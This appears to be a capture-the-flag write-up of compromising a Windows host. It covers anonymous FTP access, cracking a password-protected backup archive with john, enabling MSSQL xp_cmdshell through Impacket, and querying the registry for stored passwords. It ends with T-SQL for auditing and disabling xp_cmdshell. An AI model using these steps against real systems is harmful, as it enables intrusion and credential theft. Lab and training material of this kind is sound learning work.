```
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
|_ssl-date: T03:03:59+00:00 0s from scanner time.
3389/tcp open ms-wbt-server Microsoft Terminal Services
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Timing level 5 (Insane) used
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012 CPE: cpe:/o:microsoft:windows
|_ message_signing: disabled (dangerous, but default)
|_ Message signing enabled but not required
# Nmap done at Mon Aug 29 23:04:00 2022 - 1 IP address (1 host up) scanned in 89.54 seconds
```

The nmap scan results show that anonymous logon is enabled on the FTP server. Let's make a directory and store the files there.

We can try and crack it with john by using the rar2john tool. Let's see if we can open the archive now. Looks like some database admin credentials, possibly.

Looking at the icon on this page, I'm not familiar with it. I search Google for the Plantronics Hub logo and get a match. I check searchsploit for anything related to this product.

```
Plantronics Hub 3.13.2 - Local Privilege Escalation | windows/local/47845.txt
Plantronics Hub 3.13.2 - SpokesUpdateService Privilege Escalation (M | windows/local/47944.rb
```

Looks like there are some privilege escalation possibilities to keep in our pocket for later.

## Gobuster Enumeration

```
gobuster dir -u -w /usr/share/seclists/Discovery/Web-Content/big.txt -x aspx,asp,html -r -o gobuster80.txt
```

Nothing interesting with the gobuster enumeration.

The nmap scan identifies this as Microsoft SQL Server 2017. Now that we have DB credentials from the backup file, let's use Impacket's mssqlclient.py to connect to the database and see what we can do.

```
mssqlclient.py -port 1435
```

Once we're connected, we can run enable_xp_cmdshell to allow command execution (I found it was disabled when I first tested the client connection).

The path to code execution on the host went as follows:

- Anonymous login to the FTP server allowed for retrieval of an MSSQL backup.
- The backup was compressed in a password-protected archive.
- Given the credentials in the backup file, we can execute arbitrary commands on the host.

We can use Impacket's mssqlclient.py script to connect to the MSSQL server. Then, we'll need to enable xp_cmdshell to run commands on the host.

```
mssqlclient.py -port 1435
enable_xp_cmdshell
```

I spent far too long trying a mix of different delivery mechanisms and payload types to get a reverse shell on the target. I tried delivering with:

And, I verified the payloads made it on the target. Just no matter what I tried – encodings, scripts, binaries – nothing worked, which was frustrating to say the least.

I had a look around the file system for configuration files that might have a password, but no luck. My first registry search returned nothing.

```
EXEC xp_cmdshell 'reg query HKLM\SYSTEM /f password /t REG_SZ /s'
```

However, this search produced an interesting find.

```
EXEC xp_cmdshell 'reg query HKLM\SYSTEM /f pass /t REG_SZ /s'
```

Now, if we look at the output of the net user command, we can surmise that this is either Administrator's or jane's password. Jane doesn't have access to either of these privileged shares, but we do know her password and RDP is open on this host.

## Post-Exploit Enumeration

### Current User

```
USER INFORMATION
```
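Impacket's enable_xp_cmdshell is a thin wrapper around sp_configure. The T-SQL below is an added example, not code from the writeup: it shows what the helper runs on the instance, the sys.configurations query a DBA or defender can use to audit the setting, and the statements that turn it back off. It assumes a login holding the ALTER SETTINGS permission (the sysadmin role qualifies), which is what the credentials from the backup evidently had; the last query checks exactly that.

```sql
-- Why the leaked credentials mattered: only a login with ALTER SETTINGS
-- (sysadmin/serveradmin) can flip xp_cmdshell. 1 = member, 0 = not.
SELECT SUSER_NAME() AS login_name,
       IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin;

-- Audit: is xp_cmdshell enabled right now? value_in_use = 1 means yes.
SELECT name, value, value_in_use
FROM sys.configurations
WHERE name = 'xp_cmdshell';

-- This is what mssqlclient.py's enable_xp_cmdshell executes (assumption
-- stated in the lead-in: the login has ALTER SETTINGS).
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

-- Hardening / clean-up: switch it back off and hide the advanced options
-- again, then re-run the audit query above to confirm value_in_use = 0.
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;
```

The sys.configurations query is the quickest way to spot an instance where a tester (or an intruder) left xp_cmdshell switched on after the engagement.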